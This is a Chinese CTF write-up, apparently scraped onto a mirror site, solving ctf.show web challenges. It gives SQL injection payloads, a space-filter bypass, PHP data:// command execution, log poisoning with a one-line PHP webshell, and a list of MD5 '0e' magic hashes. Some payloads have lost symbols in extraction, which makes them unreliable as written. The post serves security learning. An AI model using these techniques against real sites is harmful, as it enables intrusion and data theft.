当前位置: 首页 > news >正文

本地服务网站开发WordPress加QQ和微信插件

本地服务网站开发,WordPress加QQ和微信插件,德化网站建设,专门做茶叶的网站#x1f36c; 博主介绍#x1f468;‍#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】 #x1f389;点赞➕评论➕收… 博主介绍‍ 博主介绍大家好我是 hacker-routing 很高兴认识大家~ ✨主攻领域【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 目录 1、web签到题 2、ctf.show_web2 3、ctf.show_web3 4、ctf.show_web4 5、ctf.show_web5 oe 绕过 6、ctf.show_web7 1、web签到题 ctfshow{2954f44e-d633-4c0f-aae8-a6aadbbafaa4} 打开题目链接发现是个静态的html页面我们直接右击查看网页源代码找到经过base64加密的flag然后再进行base64解密拿到flag 2、ctf.show_web2 ctfshow{12420c9f-6a2f-4f07-b3f7-2c3deab10619} 根据题目提示这道题目是sql注入题目那么我们就该想到利用特殊字符回显报错试试发现有不不一样的回显说明存在sql注入我们利用union联合注入。 1 or 11-- -经过order by检测发现存在三组数据 1 or 11 order by 1,2,3-- -1、爆数据库发现数据库叫web2 or 11 union select 1,database(),3-- -2、爆表发现有一个表名为flag 1 or 11 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemaweb2-- -3、爆列发现列名也是flag 1 or 11 union select 1,group_concat(column_name),3 from information_schema.columns where table_schemaweb2 and table_nameflag-- -4、爆字段直接拿到flag了 1 or 11 union select 1,flag,3 from web2.flag-- -3、ctf.show_web3 ctfshow{bbf49561-1b68-4bf3-8bb7-9fe5406b8989} 打开题目链接一看就是一道文件包含的PHP伪协议题目但是这里我们必须得判断使用什么伪协议我开始使用的是filter伪协议确实可以执行但是有个尴尬的问题就是不知道读谁那个flag文件不知道我开始尝试了flag.php但是没用/etc/passwd都出来了 后来我就利用data伪协议执行命令查看flag文件是ctf_go_go_go ?urldata://text/plain,?php system(ls);?直接读取flag ?urldata://text/plain,?php system(cat ctf_go_go_go);?4、ctf.show_web4 ctf.show_web6 ctfshow{ebf3d2f1-e911-46c6-bf08-68e39090e678} 这道题目是前面的进阶版利用伪协议没有用了这里只能使用日志注入的方法拿flag 一、日志注入利用burp抓包然后等会进行改包 ?url/var/log/nginx/access.log二、写入木马,这里需要把一句话木马加在参数里面 ?php eval($_POST[cmd]);?三、连接蚁剑拿到flag 5、ctf.show_web5 ctfshow{570ea71d-f1d6-4cd4-921c-e93d59e6e2a4} 这道题目需要我们利用PHP MD5相等绕过。 我们打开题目查看PHP代码这个PHP代码要我们构造md5(v1)md5(v1)md5(v1)md5(v2)才可以输出falg 还有下面两个函数需要符合 ctype_alpha()函数用于检测字符串中是否仅包含字母,是则返回true,否则返回falseis_numeric()函数用于检测变量是否为数字或数字字符串,是则返回true,否则返回false oe 绕过 基本的原理是这样的但更严谨的字符串格式是0e 开头同时后面都是数字不能包含其他字符的字符串md5 值才会相等 的结果为 True但 的结果为 False。 常见的 md5 值是 0e 开头且后面均为数字的字符串 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s1885207154a 0e509367213418206700842008763514 s1502113478a 0e861580163291561247404381396064 s1885207154a 0e509367213418206700842008763514 s1836677006a 0e481036490867661113260034900752 s155964671a 0e342768416822451524974117254469 s1184209335a 0e072485820392773389523109082030 s1665632922a 0e731198061491163073197128363787 s1502113478a 0e861580163291561247404381396064 s1836677006a 0e481036490867661113260034900752 s1091221200a 0e940624217856561557816327384675 s155964671a 0e342768416822451524974117254469 s1502113478a 0e861580163291561247404381396064 s155964671a 0e342768416822451524974117254469 s1665632922a 0e731198061491163073197128363787 s155964671a 0e342768416822451524974117254469 s1091221200a 0e940624217856561557816327384675 s1836677006a 0e481036490867661113260034900752 s1885207154a 0e509367213418206700842008763514 s532378020a 0e220463095855511507588041205815 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s214587387a 0e848240448830537924465865611904 s1502113478a 0e861580163291561247404381396064 s1091221200a 0e940624217856561557816327384675 s1665632922a 0e731198061491163073197128363787 s1885207154a 0e509367213418206700842008763514 s1836677006a 0e481036490867661113260034900752 s1665632922a 0e731198061491163073197128363787 s878926199a 0e545993274517709034328855841020 240610708 0e462097431906509019562988736854 314282422 0e990995504821699494520356953734 571579406 0e972379832854295224118025748221 903251147 0e174510503823932942361353209384 1110242161 0e435874558488625891324861198103 1320830526 0e912095958985483346995414060832 1586264293 0e622743671155995737639662718498 2302756269 0e250566888497473798724426794462 2427435592 0e067696952328669732475498472343 2653531602 0e877487522341544758028810610885 3293867441 0e471001201303602543921144570260 3295421201 0e703870333002232681239618856220 3465814713 0e258631645650999664521705537122 3524854780 0e507419062489887827087815735195 3908336290 0e807624498959190415881248245271 4011627063 0e485805687034439905938362701775 4775635065 0e998212089946640967599450361168 4790555361 0e643442214660994430134492464512 5432453531 0e512318699085881630861890526097 5579679820 0e877622011730221803461740184915 5585393579 0e664357355382305805992765337023 6376552501 0e165886706997482187870215578015 7124129977 0e500007361044747804682122060876 7197546197 0e915188576072469101457315675502 7656486157 0e451569119711843337267091732412 QLTHNDT 0e405967825401955372549139051580 QNKCDZO 0e830400451993494058024219903391 EEIZDOI 0e782601363539291779881938479162 TUFEPMC 0e839407194569345277863905212547 UTIPEZQ 0e382098788231234954670291303879 UYXFLOI 0e552539585246568817348686838809 IHKFRNS 0e256160682445802696926137988570 PJNPDWY 0e291529052894702774557631701704 ABJIHVY 0e755264355178451322893275696586 DQWRASX 0e742373665639232907775599582643 DYAXWCA 0e424759758842488633464374063001 GEGHBXL 0e248776895502908863709684713578 GGHMVOE 0e362766013028313274586933780773 GZECLQZ 0e537612333747236407713628225676 NWWKITQ 0e763082070976038347657360817689 NOOPCJF 0e818888003657176127862245791911 MAUXXQC 0e478478466848439040434801845361 MMHUWUV 0e701732711630150438129209816536 构造payload传参成功拿到了flag ?v1MMHUWUVv27656486157 MD5值 ?v10e830400451993494058024219903391v20e451569119711843337267091732412 6、ctf.show_web7 ctfshow{71253097-28d5-4288-a850-d4b4d14e2e4c} 一打开提名的链接没有什么直接有价值的信息右击查看源代码发现id存在123变化这一看不难让人不猜测存在sql注入漏洞。 这里经过测试发现存在空格过滤了我们利用/**/进行绕过空格会发现页面发生了变化说明绕过成功并且确实存在sql注入那么我们这里还是跟前面的题目一样利用union联合注入。 1/**/or/**/11经过测试发现前面的1需要改成-1进行回显然后测试发现存在3组内容 -1/**/union/**/select/**/1,database(),3查看数据库名称数据库名称叫web7 -1/**/union/**/select/**/1,database(),3查找表名flag,page,user -1/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schemadatabase()),3查看列名flag -1/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_nameflag),3查看flag值 -1/**/union/**/select/**/1,(select/**/group_concat(flag)/**/from/**/flag),3
http://www.dnsts.com.cn/news/192112.html

相关文章:

  • 亿级流量网站架构wordpress 3.9.12
  • 前段 网站建设实例问卷调查网站哪个好
  • 网站空间如何申请群晖直接编辑wordpress
  • 网站横幅广告怎么做到哪查找网站域名
  • 网站的点击率怎么查wordpress小工具滑至顶部
  • 怎样给公司做一个网站少儿编程网
  • 网站信息化建设方案城市建设理论研究收录网站
  • 做二手手机交易网站怎么样自己做网站赚钱年入40万
  • 建设银行河北省分行官方网站网站建设论文范文
  • 天津做网站推广的网站网站模板 兼容
  • 汕头seo网站排名桐城做网站的公司
  • 网站安全管理制度建设营口建网站的公司
  • 微信链接的微网站怎么做的三合一商城网站
  • 陆良县住房和城乡建设局网站服装设计网站模板
  • 年栾洪全单页做网站教程wordpress 设置 logo
  • 惠州网站建设哪里有wordpress服务器安装教程
  • 网站有没有做网站地图怎么看移动互联网开发招人
  • 自己有服务器怎么建设网站wordpress社交游戏
  • 谷歌英文网站优化js特效素材网
  • 太原关键词网站排名保定网站推广费用
  • 怎么做企业网站排名动态ip怎么建设网站
  • 做网站网络公司腾讯cvm安装wordpress
  • 四川省住房与城乡建设厅网站wordpress搬家失败
  • 网站开发如何入门锦州微商网站制做
  • 给金融的做网站 犯法吗四川成都设计院
  • 江苏省工程建设标准站网站石材外贸在哪个网站做
  • 海洋cms怎么做电影网站万户 网站建设
  • 交互网站 百度客户资源网
  • 科协科普网站建设ipc网站备案查询
  • 医疗手机网站建设网站版本功能列表